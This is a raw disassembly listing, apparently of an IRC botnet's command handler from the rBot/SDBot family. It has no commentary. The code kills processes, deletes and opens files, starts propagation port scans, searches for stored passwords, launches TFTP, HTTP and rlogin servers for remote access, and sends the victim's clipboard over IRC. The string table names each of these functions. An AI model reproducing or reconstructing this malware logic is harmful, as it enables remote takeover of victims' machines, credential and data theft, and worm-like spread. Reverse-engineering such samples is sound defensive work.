loc_40D790: ; CODE XREF: sub_409848+1ABB�j
; sub_409848+1ACF�j
push 20h
push [ebp+var_8]
call dword_4220CC ; SetFileAttributesA
push [ebp+var_8]
call dword_4220E4 ; DeleteFileA
test eax, eax
jz short loc_40D7B2
push [ebp+var_8]
push offset aFileDeletedS_0 ; "[FILE]: Deleted '%s'."
jmp short loc_40D7BD
; ---------------------------------------------------------------------------
loc_40D7B2: ; CODE XREF: sub_409848+3F5E�j
push offset aFile_0 ; "[FILE]:"
call sub_407369
push eax
loc_40D7BD: ; CODE XREF: sub_409848+3F68�j
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_416BCD
loc_40D7CE: ; CODE XREF: sub_409848+40A2�j
add esp, 10h
jmp loc_40B963
; ---------------------------------------------------------------------------
loc_40D7D6: ; CODE XREF: sub_409848+1A93�j
; sub_409848+1AA7�j
push [ebp+var_8]
call sub_416D02
push eax
call sub_409127
xor esi, esi
pop ecx
inc esi
pop ecx
push [ebp+var_8]
cmp eax, esi
lea eax, [ebp+var_2F0]
jnz short loc_40D7FD
push offset aProcProcessKil ; "[PROC]: Process killed ID: %s"
jmp short loc_40D802
; ---------------------------------------------------------------------------
loc_40D7FD: ; CODE XREF: sub_409848+3FAC�j
push offset aProcFailedToTe ; "[PROC]: Failed to terminate process ID:"...
loc_40D802: ; CODE XREF: sub_409848+3FB3�j
push eax
call sub_416975
add esp, 0Ch
cmp [ebp+var_C], 0
jnz loc_40AF37
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
add esp, 14h
jmp loc_40AF37
; ---------------------------------------------------------------------------
loc_40D837: ; CODE XREF: sub_409848+1A6B�j
; sub_409848+1A7F�j
push 1
xor esi, esi
push esi
push esi
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_408D49
add esp, 1Ch
cmp eax, 1
jnz short loc_40D870
push [ebp+var_8]
push offset aProcProcessK_0 ; "[PROC]: Process killed & deleted: %s"
loc_40D861: ; CODE XREF: sub_409848+2F41�j
lea eax, [ebp+var_2F0]
loc_40D867: ; CODE XREF: sub_409848+3293�j
; sub_409848+4061�j ...
push eax
call sub_416975
add esp, 0Ch
loc_40D870: ; CODE XREF: sub_409848+2F56�j
; sub_409848+3237�j ...
cmp [ebp+var_C], esi
jnz loc_40AF34
push esi
jmp loc_40AF19
; ---------------------------------------------------------------------------
loc_40D87F: ; CODE XREF: sub_409848+1A43�j
; sub_409848+1A57�j
xor esi, esi
push esi
push esi
push esi
push [ebp+var_8]
push [ebp+var_4]
push esi
push [ebp+arg_4]
call sub_408D49
add esp, 1Ch
push [ebp+var_8]
cmp eax, 1
lea eax, [ebp+var_2F0]
jnz short loc_40D8AB
push offset aProcProcessK_1 ; "[PROC]: Process killed: %s"
jmp short loc_40D867
; ---------------------------------------------------------------------------
loc_40D8AB: ; CODE XREF: sub_409848+405A�j
push offset aProcFailedTo_0 ; "[PROC]: Failed to terminate process: %s"...
jmp short loc_40D867
; ---------------------------------------------------------------------------
loc_40D8B2: ; CODE XREF: sub_409848+1A1B�j
; sub_409848+1A2F�j
mov esi, [ebp+var_8]
push esi
call dword_43A434 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_40D8EF
push 2
push 4
lea eax, [ebp+arg_0]
push eax
call dword_43A4B4 ; gethostbyaddr
test eax, eax
jz short loc_40D90A
push dword ptr [eax]
loc_40D8D8: ; CODE XREF: sub_409848+40C0�j
push esi
lea eax, [ebp+var_2F0]
push offset aDnsLookupSS_ ; "[DNS]: Lookup: %s -> %s."
push eax
call sub_416975
jmp loc_40D7CE
; ---------------------------------------------------------------------------
loc_40D8EF: ; CODE XREF: sub_409848+407A�j
push esi
call dword_43A420 ; gethostbyname
test eax, eax
jz short loc_40D90A
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_43A440 ; inet_ntoa
push eax
jmp short loc_40D8D8
; ---------------------------------------------------------------------------
loc_40D90A: ; CODE XREF: sub_409848+408C�j
; sub_409848+40B0�j
push offset aDnsCouldnTReso ; "[DNS]: Couldn't resolve hostname."
jmp loc_40B955
; ---------------------------------------------------------------------------
loc_40D914: ; CODE XREF: sub_409848+19F3�j
; sub_409848+1A07�j
push 7Fh
push [ebp+var_8]
push [ebp+arg_14]
call sub_416A00
push [ebp+var_8]
lea eax, [ebp+var_2F0]
push offset aMainServerChan ; "[MAIN]: Server changed to: '%s'."
push eax
call sub_416975
add esp, 18h
jmp loc_40EE2A
; ---------------------------------------------------------------------------
loc_40D93D: ; CODE XREF: sub_409848+19CB�j
; sub_409848+19DF�j
push 5
xor esi, esi
push esi
push esi
push [ebp+var_8]
push offset aOpen ; "open"
push esi
call dword_43A4CC ; ShellExecuteA
push [ebp+var_8]
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40D969
push offset aShellFileOpene ; "[SHELL]: File opened: %s"
jmp loc_40D867
; ---------------------------------------------------------------------------
loc_40D969: ; CODE XREF: sub_409848+4115�j
push offset aShellCouldnTOp ; "[SHELL]: Couldn't open file: %s"
jmp loc_40D867
; ---------------------------------------------------------------------------
loc_40D973: ; CODE XREF: sub_409848+19A3�j
; sub_409848+19B7�j
mov eax, [ebp+var_8]
mov cl, [eax]
mov byte_42FCD4, cl
movsx eax, byte ptr [eax]
push eax
push offset aMainPrefixChan ; "[MAIN]: Prefix changed to: '%c'."
jmp loc_40EE1B
; ---------------------------------------------------------------------------
loc_40D98C: ; CODE XREF: sub_409848+197B�j
; sub_409848+198F�j
push [ebp+var_8]
call sub_416D02
test eax, eax
pop ecx
jle loc_40F93F
push [ebp+var_8]
call sub_416D02
cmp eax, 1F4h
pop ecx
jge loc_40F93F
push 0
push 0
lea eax, [ebp+var_C8]
push 2
push eax
call sub_411114
push eax
lea eax, [ebp+var_2F0]
push offset aNickS ; "NICK %s"
push eax
call sub_416975
add esp, 1Ch
jmp loc_40CE40
; ---------------------------------------------------------------------------
loc_40D9DD: ; CODE XREF: sub_409848+1953�j
; sub_409848+1967�j
mov edi, [ebp+var_8]
push edi
call sub_416D02
test eax, eax
pop ecx
jle loc_409AC6
push edi
call sub_416D02
mov esi, 1F4h
cmp eax, esi
pop ecx
jge loc_409AC6
push offset aQuitLater ; "QUIT :later\r\n"
push edi
call sub_416D02
imul eax, 234h
pop ecx
push dword_43B26C[eax]
call sub_405D17
pop ecx
pop ecx
push esi
call dword_422000 ; Sleep
push edi
call sub_416D02
imul eax, 234h
pop ecx
push dword_43B26C[eax]
call dword_43A4D0 ; closesocket
push [ebp+var_18]
push edi
call sub_416D02
imul eax, 234h
pop ecx
push dword_43B274[eax]
call dword_4220F0 ; TerminateThread
push edi
call sub_416D02
imul eax, 234h
and dword_43B274[eax], 0
push edi
call sub_416D02
imul eax, 234h
and byte ptr dword_43B060[eax], 0
pop ecx
pop ecx
jmp loc_409AC6
; ---------------------------------------------------------------------------
loc_40DA8B: ; CODE XREF: sub_409848+192B�j
; sub_409848+193F�j
mov edi, [ebp+var_8]
push 4
mov esi, offset aAll ; "all"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40DAC8
call sub_4138A3
test eax, eax
jle short loc_40DAB0
push eax
push offset aThreadsStopped ; "[THREADS]: Stopped: %d thread(s)."
jmp loc_40EEDE
; ---------------------------------------------------------------------------
loc_40DAB0: ; CODE XREF: sub_409848+425B�j
push offset aThreadsNoActiv ; "[THREADS]: No active threads found."
loc_40DAB5: ; CODE XREF: sub_409848+4C75�j
; sub_409848+4C94�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_416975
pop ecx
pop ecx
jmp loc_40D1C6
; ---------------------------------------------------------------------------
loc_40DAC8: ; CODE XREF: sub_409848+4252�j
mov edi, [ebp+var_20]
jmp short loc_40DB3A
; ---------------------------------------------------------------------------
loc_40DACD: ; CODE XREF: sub_409848+42F6�j
mov esi, [ebp+edi*4+var_A4]
test esi, esi
jz loc_409AC6
push esi
call sub_416D02
push eax
call sub_41381B
pop ecx
pop ecx
test eax, eax
push esi
lea eax, [ebp+var_2F0]
jz short loc_40DAFC
push offset aThreadsKilledT ; "[THREADS]: Killed thread: %s."
jmp short loc_40DB01
; ---------------------------------------------------------------------------
loc_40DAFC: ; CODE XREF: sub_409848+42AB�j
push offset aThreadsFailedT ; "[THREADS]: Failed to kill thread: %s."
loc_40DB01: ; CODE XREF: sub_409848+42B2�j
push eax
call sub_416975
add esp, 0Ch
cmp [ebp+var_C], 0
jnz short loc_40DB2D
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
add esp, 14h
loc_40DB2D: ; CODE XREF: sub_409848+42C6�j
lea eax, [ebp+var_2F0]
push eax
call sub_401F0F
pop ecx
loc_40DB3A: ; CODE XREF: sub_409848+4283�j
inc edi
cmp edi, 20h
jb short loc_40DACD
jmp loc_409AC6
; ---------------------------------------------------------------------------
loc_40DB45: ; CODE XREF: sub_409848+1903�j
; sub_409848+1917�j
cmp [ebp+var_14], 0
jz loc_40F93F
push [ebp+var_8]
push [ebp+var_14]
call sub_417440
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40F93F
push esi
push offset aS_4 ; "%s\r\n"
push [ebp+arg_4]
call sub_405D17
push esi
push offset aMainIrcRawS_ ; "[MAIN]: IRC Raw: %s."
jmp short loc_40DBD2
; ---------------------------------------------------------------------------
loc_40DB7C: ; CODE XREF: sub_409848+18DB�j
; sub_409848+18EF�j
push [ebp+var_8]
push offset aPartS ; "PART %s\r\n"
push [ebp+arg_4]
call sub_405D17
push [ebp+var_8]
push offset aMainPartedChan ; "[MAIN]: Parted channel: '%s'."
jmp short loc_40DBD2
; ---------------------------------------------------------------------------
loc_40DB96: ; CODE XREF: sub_409848+18B3�j
; sub_409848+18C7�j
push [ebp+ebx+var_9C]
push [ebp+var_8]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_405D17
push [ebp+var_8]
push offset aMainJoinedCh_0 ; "[MAIN]: Joined channel: '%s'."
jmp loc_40CEFA
; ---------------------------------------------------------------------------
loc_40DBBA: ; CODE XREF: sub_409848+188B�j
; sub_409848+189F�j
push [ebp+var_8]
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_405D17
push [ebp+var_8]
push offset aMainNickChange ; "[MAIN]: Nick changed to: '%s'."
loc_40DBD2: ; CODE XREF: sub_409848+37E6�j
; sub_409848+4332�j ...
call sub_401F83
loc_40DBD7: ; CODE XREF: sub_409848+384C�j
add esp, 14h
jmp loc_40F93F
; ---------------------------------------------------------------------------
loc_40DBDF: ; CODE XREF: sub_409848+1851�j
; sub_409848+1865�j
mov cl, byte_42E356
and [ebp+arg_0], 0
test cl, cl
mov edx, offset byte_42E356
jz loc_409AC6
mov eax, edx
loc_40DBF8: ; CODE XREF: sub_409848+43B9�j
inc [ebp+arg_0]
add eax, 0Bh
cmp byte ptr [eax], 0
jnz short loc_40DBF8
test cl, cl
jz loc_409AC6
mov [ebp+var_1C], edx
loc_40DC0E: ; CODE XREF: sub_409848+469D�j
push 9
call sub_413922
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+arg_0]
add eax, ecx
cmp eax, 258h
jle short loc_40DC5E
push ecx
lea eax, [ebp+var_2F0]
push offset aScanAlreadyDSc ; "[SCAN]: Already %d scanning threads. To"...
push eax
call sub_416975
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
add esp, 20h
jmp loc_40DEDB
; ---------------------------------------------------------------------------
loc_40DC5E: ; CODE XREF: sub_409848+43E0�j
or [ebp+var_4D8], 0FFFFFFFFh
xor esi, esi
cmp dword_42E068, esi
mov [ebp+var_4DC], 0C8h
mov [ebp+var_4F0], 5
mov [ebp+var_4EC], esi
mov [ebp+arg_0], esi
jz short loc_40DCF1
mov edx, [ebp+var_1C]
add edx, 0FFFFFFF6h
mov edi, offset dword_42E068
loc_40DC97: ; CODE XREF: sub_409848+448B�j
mov esi, edx
lea eax, [edi-28h]
loc_40DC9C: ; CODE XREF: sub_409848+4470�j
mov bl, [eax]
mov cl, bl
cmp bl, [esi]
jnz short loc_40DCC0
test cl, cl
jz short loc_40DCBA
mov bl, [eax+1]
mov cl, bl
cmp bl, [esi+1]
jnz short loc_40DCC0
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_40DC9C
loc_40DCBA: ; CODE XREF: sub_409848+445E�j
xor esi, esi
xor eax, eax
jmp short loc_40DCC7
; ---------------------------------------------------------------------------
loc_40DCC0: ; CODE XREF: sub_409848+445A�j
; sub_409848+4468�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
xor esi, esi
loc_40DCC7: ; CODE XREF: sub_409848+4476�j
cmp eax, esi
jz short loc_40DCD7
inc [ebp+arg_0]
add edi, 3Ch
cmp [edi], esi
jnz short loc_40DC97
jmp short loc_40DCF1
; ---------------------------------------------------------------------------
loc_40DCD7: ; CODE XREF: sub_409848+4481�j
mov eax, [ebp+arg_0]
mov ecx, eax
imul ecx, 3Ch
mov ecx, dword_42E068[ecx]
mov [ebp+var_4F4], ecx
mov [ebp+var_4D8], eax
loc_40DCF1: ; CODE XREF: sub_409848+4442�j
; sub_409848+448D�j
cmp [ebp+var_4F4], esi
jz loc_40DF02
push 10h
pop esi
lea eax, [ebp+var_BC]
push eax
lea eax, [ebp+var_D8]
push eax
push [ebp+arg_4]
mov [ebp+var_BC], esi
call dword_43A328 ; getsockname
mov al, [ebp+var_38F]
neg al
push esi
sbb eax, eax
and eax, 0FFFF0100h
add eax, 0FFFFh
and [ebp+var_D4], eax
push [ebp+var_D4]
call dword_43A440 ; inet_ntoa
push eax
lea eax, [ebp+var_61C]
push eax
call sub_416A00
xor eax, eax
cmp [ebp+var_38F], al
push 30h
setnz al
inc eax
inc eax
mov esi, eax
lea eax, [ebp+var_61C]
push eax
call sub_4169D0
add esp, 14h
xor bl, bl
test esi, esi
jle short loc_40DD97
loc_40DD77: ; CODE XREF: sub_409848+454D�j
test eax, eax
jz short loc_40DD97
mov byte ptr [eax], 78h
lea eax, [ebp+var_61C]
push 30h
push eax
call sub_4169D0
pop ecx
inc bl
pop ecx
movsx ecx, bl
cmp ecx, esi
jl short loc_40DD77
loc_40DD97: ; CODE XREF: sub_409848+452D�j
; sub_409848+4531�j
mov eax, [ebp+arg_4]
push [ebp+var_9C]
mov [ebp+var_4F8], eax
mov eax, [ebp+var_4]
mov [ebp+var_4D0], eax
mov eax, [ebp+var_C]
mov [ebp+var_4CC], eax
mov ebx, 80h
lea eax, [ebp+var_5F8]
push ebx
push eax
mov [ebp+var_4C8], 1
call sub_416BCD
xor ecx, ecx
add esp, 0Ch
mov eax, offset aMurders ; "#murders"
inc ecx
mov edi, 422B02h
mov esi, eax
xor edx, edx
repe cmpsb
jz short loc_40DDFF
push eax
lea eax, [ebp+var_578]
push ebx
push eax
call sub_416BCD
add esp, 0Ch
jmp short loc_40DE06
; ---------------------------------------------------------------------------
loc_40DDFF: ; CODE XREF: sub_409848+45A2�j
and [ebp+var_578], 0
loc_40DE06: ; CODE XREF: sub_409848+45B5�j
xor esi, esi
cmp [ebp+var_4C8], esi
mov eax, offset aRandom ; "Random"
jnz short loc_40DE1A
mov eax, offset aSequential ; "Sequential"
loc_40DE1A: ; CODE XREF: sub_409848+45CB�j
push [ebp+var_4DC]
lea ecx, [ebp+var_61C]
push [ebp+var_4EC]
push [ebp+var_4F0]
push [ebp+var_4F4]
push ecx
push eax
lea eax, [ebp+var_2F0]
push offset aScanSPortScanS ; "[SCAN]: %s Port Scan started on %s:%d w"...
push eax
call sub_416975
push esi
lea eax, [ebp+var_2F0]
push 9
push eax
call sub_413732
add esp, 2Ch
mov [ebp+var_4E8], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_61C]
push eax
push offset sub_401B94
push esi
push esi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_4E8]
imul ecx, 234h
cmp eax, esi
mov dword_43B274[ecx], eax
jnz short loc_40DEF8
call dword_422008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
push eax
call sub_416975
add esp, 0Ch
loc_40DEAD: ; CODE XREF: sub_409848+46B8�j
cmp [ebp+var_C], esi
jnz short loc_40DECE
push esi
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
add esp, 14h
loc_40DECE: ; CODE XREF: sub_409848+4668�j
lea eax, [ebp+var_2F0]
push eax
call sub_401F0F
pop ecx
loc_40DEDB: ; CODE XREF: sub_409848+4411�j
add [ebp+var_1C], 0Bh
mov eax, [ebp+var_1C]
cmp byte ptr [eax], 0
jnz loc_40DC0E
jmp loc_409AC6
; ---------------------------------------------------------------------------
loc_40DEF0: ; CODE XREF: sub_409848+46B6�j
push 32h
call dword_422000 ; Sleep
loc_40DEF8: ; CODE XREF: sub_409848+4648�j
cmp [ebp+var_4C4], esi
jz short loc_40DEF0
jmp short loc_40DEAD
; ---------------------------------------------------------------------------
loc_40DF02: ; CODE XREF: sub_409848+44AF�j
lea eax, [ebp+var_2F0]
push offset aScanFailedTo_1 ; "[SCAN]: Failed to start scan, port is i"...
push eax
call sub_416975
pop ecx
pop ecx
jmp loc_40F222
; ---------------------------------------------------------------------------
loc_40DF1A: ; CODE XREF: sub_409848+1829�j
; sub_409848+183D�j
push [ebp+var_9C]
lea eax, [ebp+var_B4]
push 80h
push eax
call sub_416BCD
mov eax, [ebp+arg_4]
mov [ebp+var_B8], eax
mov eax, [ebp+var_4]
mov [ebp+var_30], eax
mov eax, [ebp+var_C]
push offset aFindpassSearch ; "[FINDPASS]: Searching for password."
mov [ebp+var_2C], eax
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_416BCD
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 1Eh
push eax
call sub_413732
add esp, 24h
mov [ebp+var_34], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_B8]
push eax
push offset sub_403E31
push esi
push esi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_34]
imul ecx, 234h
cmp eax, esi
mov dword_43B274[ecx], eax
jnz short loc_40DFB8
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aFindpassFail_0 ; "[FINDPASS]: Failed to start search thre"...
jmp loc_40CA14
; ---------------------------------------------------------------------------
loc_40DFB0: ; CODE XREF: sub_409848+4773�j
push 32h
call dword_422000 ; Sleep
loc_40DFB8: ; CODE XREF: sub_409848+4755�j
cmp [ebp+var_28], esi
jz short loc_40DFB0
jmp loc_40EE4D
; ---------------------------------------------------------------------------
loc_40DFC2: ; CODE XREF: sub_409848+1801�j
; sub_409848+1815�j
push 5
call sub_413922
test eax, eax
pop ecx
jle short loc_40DFE6
lea eax, [ebp+var_2F0]
push offset aTftpAlreadyRun ; "[TFTP]: Already running."
push eax
call sub_416975
xor edi, edi
jmp loc_40F625
; ---------------------------------------------------------------------------
loc_40DFE6: ; CODE XREF: sub_409848+4784�j
mov eax, [ebp+ebx+var_A0]
xor edi, edi
cmp eax, edi
mov esi, 104h
jz short loc_40E00B
push eax
lea eax, [ebp+var_1458]
push esi
push eax
call sub_416BCD
add esp, 0Ch
jmp short loc_40E01A
; ---------------------------------------------------------------------------
loc_40E00B: ; CODE XREF: sub_409848+47AE�j
push esi
lea eax, [ebp+var_1458]
push eax
push edi
call dword_422010 ; GetModuleFileNameA
loc_40E01A: ; CODE XREF: sub_409848+47C1�j
mov ebx, [ebp+ebx+var_9C]
cmp ebx, edi
jnz short loc_40E02A
mov ebx, offset byte_42FD4C
loc_40E02A: ; CODE XREF: sub_409848+47DB�j
push ebx
lea eax, [ebp+var_1354]
push esi
push eax
call sub_416BCD
mov eax, dword_42FCBC
mov [ebp+var_1248], eax
mov eax, [ebp+arg_4]
push 7Fh
push [ebp+var_9C]
mov [ebp+var_145C], eax
lea eax, [ebp+var_1244]
push eax
mov [ebp+var_124C], edi
call sub_416A00
mov eax, [ebp+var_4]
mov [ebp+var_11C4], eax
mov eax, [ebp+var_C]
mov [ebp+var_11C0], eax
lea eax, [ebp+var_1354]
push eax
lea eax, [ebp+var_1458]
push eax
push [ebp+var_1248]
lea eax, [ebp+var_2F0]
push offset aTftpServerStar ; "[TFTP]: Server started on Port: %d, Fil"...
push eax
call sub_416975
push edi
lea eax, [ebp+var_2F0]
push 5
push eax
call sub_413732
add esp, 38h
mov [ebp+var_1250], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_145C]
push eax
push offset sub_41326A
push edi
push edi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_1250]
imul ecx, 234h
cmp eax, edi
mov dword_43B274[ecx], eax
jnz short loc_40E10C
call dword_422008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aTftpFailedTo_0 ; "[TFTP]: Failed to start server thread, "...
push eax
call sub_416975
add esp, 0Ch
jmp loc_40F627
; ---------------------------------------------------------------------------
loc_40E104: ; CODE XREF: sub_409848+48CA�j
push 32h
call dword_422000 ; Sleep
loc_40E10C: ; CODE XREF: sub_409848+489A�j
cmp [ebp+var_11BC], edi
jz short loc_40E104
jmp loc_40F627
; ---------------------------------------------------------------------------
loc_40E119: ; CODE XREF: sub_409848+17D9�j
; sub_409848+17ED�j
mov esi, [ebp+ebx+var_A0]
test esi, esi
jz short loc_40E138
push esi
call sub_416D02
test eax, eax
pop ecx
jz short loc_40E138
push esi
call sub_416D02
pop ecx
jmp short loc_40E13D
; ---------------------------------------------------------------------------
loc_40E138: ; CODE XREF: sub_409848+48DA�j
; sub_409848+48E5�j
mov eax, dword_42FCC0
loc_40E13D: ; CODE XREF: sub_409848+48EE�j
mov ebx, [ebp+ebx+var_9C]
mov [ebp+var_B10], eax
xor eax, eax
cmp [ebp+var_38C], al
setz al
xor edi, edi
cmp ebx, edi
mov [ebp+var_AFC], eax
jz short loc_40E172
lea eax, [ebp+var_C14]
push ebx
push eax
call sub_416975
pop ecx
pop ecx
jmp short loc_40E19D
; ---------------------------------------------------------------------------
loc_40E172: ; CODE XREF: sub_409848+4917�j
push 104h
lea eax, [ebp+var_860]
push eax
call dword_422048 ; GetSystemDirectoryA
push edi
push edi
push edi
lea eax, [ebp+var_D4]
push eax
lea eax, [ebp+var_860]
push eax
call sub_41809F
add esp, 14h
loc_40E19D: ; CODE XREF: sub_409848+4928�j
lea eax, [ebp+var_C14]
lea edx, [eax+1]
loc_40E1A6: ; CODE XREF: sub_409848+4963�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40E1A6
sub eax, edx
cmp [ebp+eax+var_C15], 5Ch
jnz short loc_40E1D2
lea eax, [ebp+var_C14]
lea edx, [eax+1]
loc_40E1C2: ; CODE XREF: sub_409848+497F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40E1C2
sub eax, edx
and [ebp+eax+var_C15], cl
loc_40E1D2: ; CODE XREF: sub_409848+496F�j
push [ebp+var_9C]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_E9C]
push 80h
push eax
mov [ebp+var_EA0], esi
call sub_416BCD
mov eax, [ebp+var_C]
mov ebx, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_B00], eax
lea eax, [ebp+var_C14]
push eax
push [ebp+var_B10]
mov [ebp+var_B04], ebx
push esi
call sub_408894
pop ecx
push eax
lea eax, [ebp+var_2F0]
push offset aHttpdServerLis ; "[HTTPD]: Server listening on IP: %s:%d,"...
push eax
call sub_416975
push edi
lea eax, [ebp+var_2F0]
push 4
push eax
call sub_413732
add esp, 20h
mov [ebp+var_B08], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_EA0]
push eax
push offset sub_40558B
push edi
push edi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_B08]
imul ecx, 234h
cmp eax, edi
mov dword_43B274[ecx], eax
jnz short loc_40E28D
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aHttpdFailedT_1 ; "[HTTPD]: Failed to start server thread,"...
jmp loc_40C466
; ---------------------------------------------------------------------------
loc_40E285: ; CODE XREF: sub_409848+4A4B�j
push 32h
call dword_422000 ; Sleep
loc_40E28D: ; CODE XREF: sub_409848+4A2A�j
cmp [ebp+var_AF4], edi
jz short loc_40E285
jmp loc_40C475
; ---------------------------------------------------------------------------
loc_40E29A: ; CODE XREF: sub_409848+17B1�j
; sub_409848+17C5�j
mov esi, [ebp+ebx+var_A0]
test esi, esi
jz short loc_40E2B9
push esi
call sub_416D02
test eax, eax
pop ecx
jz short loc_40E2B9
push esi
call sub_416D02
pop ecx
jmp short loc_40E2BE
; ---------------------------------------------------------------------------
loc_40E2B9: ; CODE XREF: sub_409848+4A5B�j
; sub_409848+4A66�j
mov eax, dword_42FCC4
loc_40E2BE: ; CODE XREF: sub_409848+4A6F�j
mov [ebp+var_90C], eax
mov eax, [ebp+ebx+var_9C]
xor edi, edi
cmp eax, edi
jnz short loc_40E2D7
lea eax, [ebp+var_F0]
loc_40E2D7: ; CODE XREF: sub_409848+4A87�j
push eax
lea eax, [ebp+var_A4C]
push 40h
push eax
call sub_416BCD
mov ebx, [ebp+ebx+var_98]
add esp, 0Ch
cmp ebx, edi
jnz short loc_40E2F9
mov ebx, 422B02h
loc_40E2F9: ; CODE XREF: sub_409848+4AAA�j
push ebx
lea eax, [ebp+var_A0C]
push 100h
push eax
call sub_416BCD
push [ebp+var_9C]
lea eax, [ebp+var_ACC]
push 80h
push eax
call sub_416BCD
mov eax, [ebp+var_C]
mov esi, [ebp+arg_4]
mov ebx, [ebp+var_4]
add esp, 18h
mov [ebp+var_8F8], eax
lea eax, [ebp+var_A4C]
push eax
push [ebp+var_90C]
mov [ebp+var_AD0], esi
push esi
mov [ebp+var_8FC], ebx
call sub_408894
pop ecx
push eax
lea eax, [ebp+var_2F0]
push offset aRlogindServerL ; "[RLOGIND]: Server listening on IP: %s:%"...
push eax
call sub_416975
push edi
lea eax, [ebp+var_2F0]
push 7
push eax
call sub_413732
add esp, 20h
mov [ebp+var_908], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_AD0]
push eax
push offset sub_410B7C
push edi
push edi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_908]
imul ecx, 234h
cmp eax, edi
mov dword_43B274[ecx], eax
jnz short loc_40E3C6
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aRlogindFailedT ; "[RLOGIND]: Failed to start server threa"...
jmp loc_40C466
; ---------------------------------------------------------------------------
loc_40E3BE: ; CODE XREF: sub_409848+4B84�j
push 32h
call dword_422000 ; Sleep
loc_40E3C6: ; CODE XREF: sub_409848+4B63�j
cmp [ebp+var_8F4], edi
jz short loc_40E3BE
jmp loc_40C475
; ---------------------------------------------------------------------------
loc_40E3D3: ; CODE XREF: sub_409848+1789�j
; sub_409848+179D�j
mov ebx, [ebp+ebx+var_A0]
test ebx, ebx
jz short loc_40E3E6
push ebx
call sub_416D02
jmp short loc_40E3ED
; ---------------------------------------------------------------------------
loc_40E3E6: ; CODE XREF: sub_409848+4B94�j
push 9
call sub_413941
loc_40E3ED: ; CODE XREF: sub_409848+4B9C�j
test eax, eax
pop ecx
jz loc_40F93F
push eax
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4010CA
jmp loc_40E8DC
; ---------------------------------------------------------------------------
loc_40E40D: ; CODE XREF: sub_409848+1761�j
; sub_409848+1775�j
mov eax, dword_43A4A8
test eax, eax
jz short loc_40E430
call eax ; DnsFlushResolverCache
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40E429
push offset aFlushdnsDnsCac ; "[FLUSHDNS]: DNS cache flushed."
jmp short loc_40E451
; ---------------------------------------------------------------------------
loc_40E429: ; CODE XREF: sub_409848+4BD8�j
push offset aFlushdnsFailed ; "[FLUSHDNS]: Failed to flush DNS cache."
jmp short loc_40E451
; ---------------------------------------------------------------------------
loc_40E430: ; CODE XREF: sub_409848+4BCC�j
push offset aFlushdnsFail_0 ; "[FLUSHDNS]: Failed to load dnsapi.dll."
lea eax, [ebp+var_2F0]
jmp short loc_40E451
; ---------------------------------------------------------------------------
loc_40E43D: ; CODE XREF: sub_409848+1739�j
; sub_409848+174D�j
call sub_4087B6
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40E461
push offset aFlushdnsArpC_0 ; "[FLUSHDNS]: ARP cache flushed."
loc_40E451: ; CODE XREF: sub_409848+4BDF�j
; sub_409848+4BE6�j ...
push 200h
push eax
call sub_416BCD
jmp loc_40ED5F
; ---------------------------------------------------------------------------
loc_40E461: ; CODE XREF: sub_409848+4C02�j
push offset aFlushdnsFail_1 ; "[FLUSHDNS]: Failed to flush ARP cache."
jmp short loc_40E451
; ---------------------------------------------------------------------------
loc_40E468: ; CODE XREF: sub_409848+1711�j
; sub_409848+1725�j
cmp [ebp+var_C], 0
jnz short loc_40E489
push 0
push [ebp+var_4]
push offset aClipboardData ; "-[Clipboard Data]-"
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
add esp, 14h
loc_40E489: ; CODE XREF: sub_409848+4C24�j
push 0
push [ebp+var_4]
call sub_4073F3
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
push offset aMainGetClipboa ; "[MAIN]: Get Clipboard."
jmp loc_40E7A5
; ---------------------------------------------------------------------------
loc_40E4AC: ; CODE XREF: sub_409848+1382�j
; sub_409848+1396�j
push 8
